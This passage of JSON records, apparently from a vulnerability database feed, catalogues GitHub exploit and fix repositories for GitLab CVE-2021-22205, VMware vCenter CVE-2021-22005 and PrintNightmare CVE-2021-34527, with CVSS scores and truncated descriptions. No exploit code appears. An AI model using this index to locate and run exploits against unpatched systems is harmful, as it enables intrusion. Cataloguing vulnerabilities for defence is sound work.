"attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-29T04:15:00", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-09-28T11:32:45", "id": "7216751D-367F-5D68-BBFC-F5DF2584DEC5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:09:18", "description": "# CVE-2021-22205\n\n**\u5f71\u54cd\u7248\u672c\uff1a**\n* Gitlab CE/EE < 13.10.3\n* Gitlab CE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-28T14:02:51", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-09-28T11:32:44", "id": "D745F7C4-87A0-56AB-9403-D0282C5A8C99", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:05:37", "description": "# CVE-2021-22205\n\nGitLab CE/EE Preauth RCE using ExifTool\n\n*This...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-11T04:34:07", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-11-24T20:19:57", "id": "8E284760-82AD-5C4C-BD1C-413114595833", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T23:03:13", "description": "# VMWare-C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T19:11:22", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-08-17T19:20:50", "id": "5ADFCBCF-BEC4-5B45-818D-9C25EAF0F9AF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:14:14", "description": "# CVE-2021-22005-metasploit\nthe metasploit script(POC/EXP) about...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-24T23:14:01", "type": "githubexploit", "title": "Exploit for Path Traversal in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-11-09T18:14:11", "id": "6E42EC2D-B570-5376-884C-7C0566A1CA3D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-16T20:01:22", "description": "# CVE-2021-22005-\nCVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-25T07:19:42", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-07-16T13:57:16", "id": "97046A6F-8428-5DCF-88B4-4101351D637C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T19:04:56", "description": "# CVE-2021-22005\n\nVMware vCenter RCE CVE-2021-22005 one-liner ma...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T00:09:03", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-13T21:13:47", "id": "B31B0189-453E-5CA5-8FF3-5DC05043BE98", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:33:40", "description": "# cve-2021-22005-exp\n\n## 0x01 \u6f0f\u6d1e\u7b80\u4ecb\n2021\u5e749\u670821\u65e5\uff0cVMware\u53d1\u5e03\u5b89\u5168\u516c\u544a\uff0c\u516c\u5f00\u62ab\u9732\u4e86...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-18T08:18:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2023-11-24T20:21:04", "id": "D97D0E5A-B60D-5B5B-93AC-3D6249E5A9C5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-13T17:42:26", "description": "# CVE-2021-22005 - VMWare vCenter Server File Upload to RCE\n####...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-25T16:21:56", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-08-13T15:06:43", "id": "AAD2737A-E98E-59B4-8310-3DF28159B7F4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T14:15:18", "description": "# CVE-2021-22005poc\nCVE-2021-22005 vcenter\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6279\u91cf\u9a8c\u8bc1poc\n\n\n\u4e00\u3001\u7528\u6cd5\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-15T13:11:04", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-03-15T03:51:38", "id": "9B660139-27C8-56B8-B9E2-8124D0E9F502", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-18T14:29:26", "description": "# PrintNightmare CVE-2021-34527\n\nBy now you most probably alread...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T07:58:53", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T12:16:25", "id": "7C3B421E-ED99-5C5F-B2BA-4418307C0EBF", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:34", "description": "# Fix-CVE-2021-34527\nFix for the securit...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T14:25:44", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-03T09:03:00", "id": "FBC9D472-5E25-508D-AB6E-B3197FCFED2D", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:19", "description": "# PowerShell-PrintNightmare\nA collection of scripts to help set ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T21:28:16", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-11T16:21:00", "id": "98CA9A39-577D-51F2-B8B9-B20E80D94173", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T19:08:13", "description": "# PsFix-CVE-2021-34527\nFix-CVE-2021-34527\nFi...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-04-07T20:14:31", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T20:18:26", "id": "26B4C125-95CE-54A5-82FB-2D1C219A09CB", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:24", "description": "# Printnightmare\nFix for PrintNightmare CVE-2021-34527\n\n![Printn...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T09:22:03", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-09T11:02:54", "id": "4A3F2A96-B727-5EF1-B1C1-FE041BA02E28", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:55:35", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T01:32:18", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-09T03:54:14", "id": "1E42289A-77F8-55A2-B85E-83CAA00CE951", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:16:59", "description": "# disable-RegisterSpoolerRemoteRpcEndPoint\nWorkaround for Window...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-05T16:49:32", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-08T21:11:43", "id": "E235B3DF-990F-5508-9496-90462B45125D", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:56", "description": "PrintNightmare CVE-2021-34527 powershell PowerShell workaround t...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-05T20:02:50", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-07T13:34:12", "id": "5AE71695-062E-5DBA-9A16-69BD0C7D1384", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-19T06:22:28", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-13T10:04:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-12-13T10:21:38", "id": "3DC96731-93EE-5FF0-9AC3-C472059DC1AF", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-26T12:23:19", "description": "# Introduction\nPrintNightmare-Patcher, a simple tool that resolv...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-12T14:14:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 